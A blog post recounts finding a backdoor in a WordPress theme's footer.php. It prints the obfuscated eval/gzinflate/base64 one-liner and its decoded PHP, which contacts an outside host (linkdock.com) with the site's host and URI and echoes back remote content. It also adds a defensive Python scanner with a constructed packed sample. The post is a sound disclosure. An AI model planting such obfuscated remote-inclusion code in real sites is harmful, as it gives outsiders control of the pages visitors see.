Backdoor in WordPress themes?

I was looking for a theme to use in a WordPress blog and I stumbled on this one.

Cool, I thought, I might use it… but… hey… why is there this weird stuff in footer.php?

<? eval(gzinflate(base64_decode('vZHRasIwFIavV/AdQpCSglSvJ7INV3Aw0
NV2N2MESU9tZpZTkuiE6bsvOrsibre7/c+X/3xJwBg03ECNxkm9ZINoGHTHWEC
ePpIRoZVz9XW/r6ReFShWscD3vkDtQLu4ruobWYzCCq0b0XhtFGjhj7Iunyfpc
5K+0EmWzfhkOs/oaxTTcG3kH2CaPOXJPON5+uDRYdAJZEkYk9ptFootwXFRL
vlmYRhdKIUf3JfwEmvQNIrIbkdOpNSSe/o3KiJhSMq1Fk6i5rCV1llGS6mAH/u/
b2UPfZ+d4ApEheT2Ysya14mGnWBPQFn4R9NGrnvS8V90VDyzOqm/odSM0h5
p4HPji35xUPBWrl1S+f6f+HzHMbbgsPYDUfXI2E+ms4xPkrv7JO2RQYvBFsQBa
hOh0EIT7b8A'
))); ?>

Uhm… it looks very suspicious. Too suspicious. Let’s replace eval with die and see what all that stuff is:

error_reporting(0);
$CodeURL = "http://linkdock.com/content.php?id=&host=".
                  urlencode($_SERVER["HTTP_HOST"])."&uri=".
                  urlencode($_SERVER["REQUEST_URI"]);

if ((intval(get_cfg_var("allow_url_fopen")) ||
     intval(ini_get("allow_url_fopen"))) &&
     function_exists("file_get_contents")) {

    echo @file_get_contents($CodeURL);

} elseif ((intval(get_cfg_var("allow_url_fopen")) ||
            intval(ini_get("allow_url_fopen"))) && function_exists("file")) {

    $content = @file($CodeURL);
    echo @join("", $content);

} elseif (function_exists("curl_init")) {

    $ch = curl_init($CodeURL);
    curl_setopt($ch, CURLOPT_HEADER, 0);
    curl_exec($ch);
    curl_close($ch);
}

Yep. It definitely looks like a backdoor.
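A defender's version of the eval-to-die trick, added here as an example (it is not the theme's code nor the author's): a small Python scanner that finds the eval(gzinflate(base64_decode('…'))) wrapper in a theme file, decodes the payload offline without ever executing it, and flags the markers seen in the decoded code above. The sample footer.php content, the packed payload and the example.invalid URL are constructed for the demo.

```python
import base64
import re
import zlib

# Wrapper shape used by the backdoor in the post; the blob may be wrapped over several lines.
EVAL_PATTERN = re.compile(
    r"eval\s*\(\s*gzinflate\s*\(\s*base64_decode\s*\(\s*'([^']+)'\s*\)\s*\)\s*\)",
    re.IGNORECASE | re.DOTALL,
)

# Strings worth flagging in a decoded payload (all present in the decoded code above).
SUSPICIOUS_MARKERS = (
    "error_reporting(0)", '$_SERVER["HTTP_HOST"]', "file_get_contents(",
    "curl_init(", "http://",
)

def decode_payload(blob: str) -> str:
    """Recover the hidden PHP statically: base64, then raw DEFLATE (what gzinflate does).
    Nothing is executed, unlike swapping eval for die and loading the page."""
    raw = base64.b64decode("".join(blob.split()))  # drop line-wrap whitespace first
    return zlib.decompress(raw, -15).decode("utf-8", errors="replace")

def scan_php(source: str) -> list:
    """Return one finding per packed eval() with the decoded code and matched markers."""
    findings = []
    for m in EVAL_PATTERN.finditer(source):
        try:
            decoded = decode_payload(m.group(1))
        except (ValueError, zlib.error):
            decoded = ""  # blob is not valid base64/DEFLATE; still report the wrapper
        markers = [k for k in SUSPICIOUS_MARKERS if k in decoded]
        findings.append({"offset": m.start(), "decoded": decoded, "markers": markers})
    return findings

def pack_like_backdoor(php: str) -> str:
    """Inverse of gzinflate(base64_decode()): raw DEFLATE, then base64 (test helper)."""
    c = zlib.compressobj(9, zlib.DEFLATED, -15)
    return base64.b64encode(c.compress(php.encode()) + c.flush()).decode()

# Constructed sample payload in the shape of the one in the post (example.invalid is a placeholder).
SAMPLE_PAYLOAD = (
    "error_reporting(0);\n"
    '$CodeURL = "http://example.invalid/content.php?host=".urlencode($_SERVER["HTTP_HOST"]);\n'
    "echo @file_get_contents($CodeURL);\n"
)
# Constructed footer.php: a legitimate call followed by the packed one-liner.
SAMPLE_FOOTER = ("<?php wp_footer(); ?>\n<? eval(gzinflate(base64_decode('"
                 + pack_like_backdoor(SAMPLE_PAYLOAD) + "'))); ?>\n")

if __name__ == "__main__":
    for f in scan_php(SAMPLE_FOOTER):
        print(f"offset {f['offset']}: markers {f['markers']}\n{f['decoded']}")
```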

It seems that you can never be too careful…

(It seems that the first version I’ve downloaded is different from the one on the site mentioned above, although there’s still something evil in footer.php.)
